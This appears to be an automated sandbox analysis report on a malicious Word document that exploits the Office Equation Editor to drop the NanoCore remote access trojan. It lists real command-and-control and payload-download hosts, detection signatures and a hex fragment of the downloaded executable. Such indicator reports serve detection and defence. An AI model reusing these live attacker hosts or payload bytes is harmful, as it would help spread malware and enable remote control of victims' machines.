Analysis Report Statement.doc

AV Detection:

Found malware configuration

Source: JNM.exe.2304.7.memstr

Malware Configuration Extractor: NanoCore {"C2: ": ["46.243.219.32"], "Version: ": "NanoCore Client, Version=1.2.2.0"}

Multi AV Scanner detection for domain / URL

Source: manojvashanava234.sytes.net	Virustotal: Detection: 10%			Perma Link
Source: http://manojvashanava234.sytes.net/WAH.exe	Virustotal: Detection: 9%			Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Roaming\JNM.exe	ReversingLabs: Detection: 34%

Multi AV Scanner detection for submitted file

Source: Statement.doc	Virustotal: Detection: 45%			Perma Link
Source: Statement.doc	ReversingLabs: Detection: 58%

Yara detected Nanocore RAT

Source: Yara match	File source: 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2357133398.0000000002501000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2148462400.00000000022E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2147229612.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2359067091.0000000003549000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2356349375.0000000000630000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2148652827.00000000032E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2173210741.0000000005059000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2144054472.0000000003549000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2143981724.0000000002541000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: JNM.exe PID: 1692, type: MEMORY
Source: Yara match	File source: Process Memory Space: JNM.exe PID: 2304, type: MEMORY
Source: Yara match	File source: Process Memory Space: JNM.exe PID: 2360, type: MEMORY
Source: Yara match	File source: 7.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.JNM.exe.630000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.JNM.exe.630000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\JNM.exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 7.2.JNM.exe.630000.3.unpack

Avira: Label: TR/NanoCore.fadte

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\user\AppData\Roaming\JNM.exe

Jump to behavior

Office Equation Editor has been started

Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: Pinaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: JNM.exe, 00000003.00000002.2356181917.00000000004D6000.00000004.00000020.sdmp
Source:	Binary string: \REGISTRY\USER\S-1-5-21-966771315-3019405637-367336477-1006_Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4JNM.PDB-F424491E3931}\Servererver32 source: JNM.exe, 0000000F.00000002.2355712720.0000000000298000.00000004.00000001.sdmp
Source:	Binary string: \REGISTRY\USER\S-1-5-21-966771315-3019405637-367336477-1006_Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4JNM.PDB-F424491E3931}\Servererver32h source: JNM.exe, 00000003.00000002.2356038607.00000000003E8000.00000004.00000001.sdmp
Source:	Binary string: MC:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbicddH?X source: JNM.exe, 00000003.00000002.2356207673.00000000004FA000.00000004.00000020.sdmp
Source:	Binary string: 8inaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: JNM.exe, 0000000F.00000002.2356007529.0000000000373000.00000004.00000020.sdmp
Source:	Binary string: >vbpC:\Users\user\AppData\Roaming\JNM.PDBBPJQ source: JNM.exe, 00000003.00000002.2356038607.00000000003E8000.00000004.00000001.sdmp
Source:	Binary string: 8(P5jLC:\Windows\Microsoft.VisualBasic.pdb source: JNM.exe, 0000000F.00000002.2355712720.0000000000298000.00000004.00000001.sdmp
Source:	Binary string: Qsers\user\AppData\Roaming\JNM.exeVisualBasic.pdb*n source: JNM.exe, 00000003.00000002.2356207673.00000000004FA000.00000004.00000020.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Roaming\JNM.PDB source: JNM.exe, 0000000F.00000002.2355712720.0000000000298000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\user\AppData\Roaming\JNM.exe77-1006j_731629843\objr\x86\Microsoft.VisualBasic.pdbisualBasic.pdb source: JNM.exe, 00000003.00000002.2356038607.00000000003E8000.00000004.00000001.sdmp, JNM.exe, 0000000F.00000002.2355712720.0000000000298000.00000004.00000001.sdmp
Source:	Binary string: QC:\Users\user\AppData\Roaming\JNM.PDB source: JNM.exe, 00000003.00000002.2356038607.00000000003E8000.00000004.00000001.sdmp
Source:	Binary string: M.PDBr source: JNM.exe, 0000000F.00000002.2356007529.0000000000373000.00000004.00000020.sdmp
Source:	Binary string: (P5jLC:\Windows\Microsoft.VisualBasic.pdb source: JNM.exe, 00000003.00000002.2356038607.00000000003E8000.00000004.00000001.sdmp
Source:	Binary string: ,:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: JNM.exe, 0000000F.00000002.2356007529.0000000000373000.00000004.00000020.sdmp
Source:	Binary string: )vbpC:\Users\user\AppData\Roaming\JNM.PDB.x source: JNM.exe, 0000000F.00000002.2355712720.0000000000298000.00000004.00000001.sdmp
Source:	Binary string: :\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: JNM.exe, 00000003.00000002.2366184294.0000000006EF0000.00000004.00000001.sdmp

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: manojvashanava234.sytes.net

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 84.38.135.158:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 84.38.135.158:80

Networking:

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

IPs: 46.243.219.32

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.22:49166 -> 46.243.219.32:2420

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 27 Jan 2021 18:12:25 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.1Last-Modified: Wed, 27 Jan 2021 18:12:25 GMTETag: W/"1e1e00-5b9e73c7fac88"Accept-Ranges: bytesContent-Length: 1973760Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 02 00 e7 39 11 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 1a 1e 00 00 02 00 00 00 00 00 00 5e 38 1e 00 00 20 00 00 00 40 1e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 1e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 38 1e 00 4b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 1e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 18 1e 00 00 20 00 00 00 1a 1e 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 1e 00 00 02 00 00 00 1c 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 38 1e 00 00 00 00 00 48 00 00 00 02 00 05 00 b0 52 00 00 60 e5 1d 00 03 00 00 00 94 01 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 1a 20 00 00 00 00 2a fa fe 09 01 00 39 30 00 00 00 28 95 01 00 06 39 18 00 00 00 fe 09 00 00 72 60 02 1d 70 fe 09 01 00 28 43 00 00 0a 28 44 00 00 0a 2a fe 09 00 00 fe 09 01 00 28 45 00 00 0a 2a fe 09 00 00 2a 2a fe 09 00 00 28 5f 00 00 0a 2a 00 13 30 01 00 5f 08 00 00 00 00 00 00 28 93 01 00 06 28 92 01 00 06 28 91 01 00 06 28 90 01 00 06 28 8f 01 00 06 28 8e 01 00 06 28 8d 01 00 06 28 8c 01 00 06 28 8b 01 00 06 28 8a 01 00 06 28 89 01 00 06 fe 06 01 00 00 0a 80 87 01 00 04 28 88 01 00 06 28 87 01 00 06 28 86 01 00 06 fe 06 02 00 00 0a 80 86 01 00 04 28 85 01 00 06 28 84 01 00 06 28 83 01 00 06 fe 06 03 00 00 0a 80 85 01 00 04 28 82 01 00 06 28 81 01 00 06 28 80 01 00 06 28 7f 01 00 06 28 7e 01 00 06 28 7d 01 00 06 28 7c 01 00 06 28 7b 01 00 06 28 7a 01 00 06 28 79 01 00 06 28 78 01 00 06 28 77 01 00 06 28 76 01 00 06 28 75 01 00 06 28 74 01 00 06 28 73 01 00 06 2

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /WAH.exe HTTP/1.1Connection: Keep-AliveHost: manojvashanava234.sytes.net

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: DATACLUBLV DATACLUBLV

Downloads files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{55454834-8E09-401E-A760-1A1C7B299BE3}.tmp

Jump to behavior

Downloads files from webservers via HTTP

Source: global traffic

HTTP traffic detected: GET /WAH.exe HTTP/1.1Connection: Keep-AliveHost: manojvashanava234.sytes.net

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: manojvashanava234.sytes.net

Urls found in memory or binary data

Source: JNM.exe, 00000003.00000002.2364935179.0000000006420000.00000002.00000001.sdmp, JNM.exe, 00000007.00000002.2361274784.0000000005760000.00000002.00000001.sdmp, taskeng.exe, 0000000D.00000002.2356083438.0000000001BE0000.00000002.00000001.sdmp, JNM.exe, 0000000F.00000002.2363821875.00000000064C0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: JNM.exe, 00000003.00000002.2364935179.0000000006420000.00000002.00000001.sdmp, JNM.exe, 00000007.00000002.2361274784.0000000005760000.00000002.00000001.sdmp, taskeng.exe, 0000000D.00000002.2356083438.0000000001BE0000.00000002.00000001.sdmp, JNM.exe, 0000000F.00000002.2363821875.00000000064C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a raw input device (often for capturing keystrokes)

Source: JNM.exe, 00000007.00000002.2359067091.0000000003549000.00000004.00000001.sdmp

Binary or memory string: RegisterRawInputDevices

E-Banking Fraud:

Yara detected Nanocore RAT

Source: Yara match	File source: 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2357133398.0000000002501000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2148462400.00000000022E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2147229612.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2359067091.0000000003549000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2356349375.0000000000630000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2148652827.00000000032E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2173210741.0000000005059000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2144054472.0000000003549000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2143981724.0000000002541000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: JNM.exe PID: 1692, type: MEMORY
Source: Yara match	File source: Process Memory Space: JNM.exe PID: 2304, type: MEMORY
Source: Yara match	File source: Process Memory Space: JNM.exe PID: 2360, type: MEMORY
Source: Yara match	File source: 7.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.JNM.exe.630000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.JNM.exe.630000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001A.00000002.2148462400.00000000022E1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001A.00000002.2147229612.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000001A.00000002.2147229612.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000002.2359067091.0000000003549000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000002.2356337271.0000000000620000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.2356349375.0000000000630000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000001A.00000002.2148652827.00000000032E9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000002.2173210741.0000000005059000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000010.00000002.2173210741.0000000005059000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000017.00000002.2144054472.0000000003549000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000017.00000002.2143981724.0000000002541000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: JNM.exe PID: 1692, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: JNM.exe PID: 1692, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: JNM.exe PID: 2304, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: JNM.exe PID: 2304, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: JNM.exe PID: 2360, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: JNM.exe PID: 2360, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.JNM.exe.620000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.JNM.exe.630000.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 26.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 26.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.JNM.exe.630000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 23.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 23.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\user\AppData\Roaming\JNM.exe

Jump to dropped file

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\user\AppData\Roaming\JNM.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\timeout.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\JNM.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\JNM.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Memory allocated: 76D20000 page execute and read and write

Contains functionality to call native functions

Source: C:\Users\user\AppData\Roaming\JNM.exe	Code function: 3_2_00400AC4 NtSetInformationThread,		3_2_00400AC4
Source: C:\Users\user\AppData\Roaming\JNM.exe	Code function: 3_2_00408E03 NtSetInformationThread,		3_2_00408E03
Source: C:\Users\user\AppData\Roaming\JNM.exe	Code function: 15_2_00450AC4 NtSetInformationThread,		15_2_00450AC4
Source: C:\Users\user\AppData\Roaming\JNM.exe	Code function: 15_2_00458DE5 NtSetInformationThread,		15_2_00458DE5
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 16_2_003B0AC4 NtSetInformationThread,		16_2_003B0AC4
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 16_2_003B8E03 NtSetInformationThread,		16_2_003B8E03

Detected potential crypto function

Source: C:\Users\user\AppData\Roaming\JNM.exe	Code function: 3_2_00404BE8		3_2_00404BE8
Source: C:\Users\user\AppData\Roaming\JNM.exe	Code function: 3_2_00404881		3_2_00404881
Source: C:\Users\user\AppData\Roaming\JNM.exe	Code function: 7_2_0044E038		7_2_0044E038
Source: C:\Users\user\AppData\Roaming\JNM.exe	Code function: 7_2_0044C0B0		7_2_0044C0B0
Source: C:\Users\user\AppData\Roaming\JNM.exe	Code function: 7_2_004443A0		7_2_004443A0
Source: C:\Users\user\AppData\Roaming\JNM.exe	Code function: 7_2_0044B498		7_2_0044B498
Source: C:\Users\user\AppData\Roaming\JNM.exe	Code function: 7_2_00443788		7_2_00443788
Source: C:\Users\user\AppData\Roaming\JNM.exe	Code function: 7_2_0044C16E		7_2_0044C16E
Source: C:\Users\user\AppData\Roaming\JNM.exe	Code function: 7_2_0044C129		7_2_0044C129
Source: C:\Users\user\AppData\Roaming\JNM.exe	Code function: 7_2_00444458		7_2_00444458
Source: C:\Users\user\AppData\Roaming\JNM.exe	Code function: 15_2_00454BE8		15_2_00454BE8
Source: C:\Users\user\AppData\Roaming\JNM.exe	Code function: 15_2_00454BDA		15_2_00454BDA
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 16_2_003B4BE8		16_2_003B4BE8
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 16_2_003B4BDA		16_2_003B4BDA
Source: C:\Users\user\AppData\Roaming\JNM.exe	Code function: 23_2_002143A0		23_2_002143A0
Source: C:\Users\user\AppData\Roaming\JNM.exe	Code function: 23_2_00213788		23_2_00213788
Source: C:\Users\user\AppData\Roaming\JNM.exe	Code function: 23_2_00214C78		23_2_00214C78
Source: C:\Users\user\AppData\Roaming\JNM.exe	Code function: 23_2_00214458		23_2_00214458
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 26_2_003F43A0		26_2_003F43A0
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 26_2_003F3788		26_2_003F3788
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 26_2_003F4458		26_2_003F4458

Yara signature match

Source: 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001A.00000002.2148462400.00000000022E1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001A.00000002.2147229612.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000001A.00000002.2147229612.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000002.2359067091.0000000003549000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
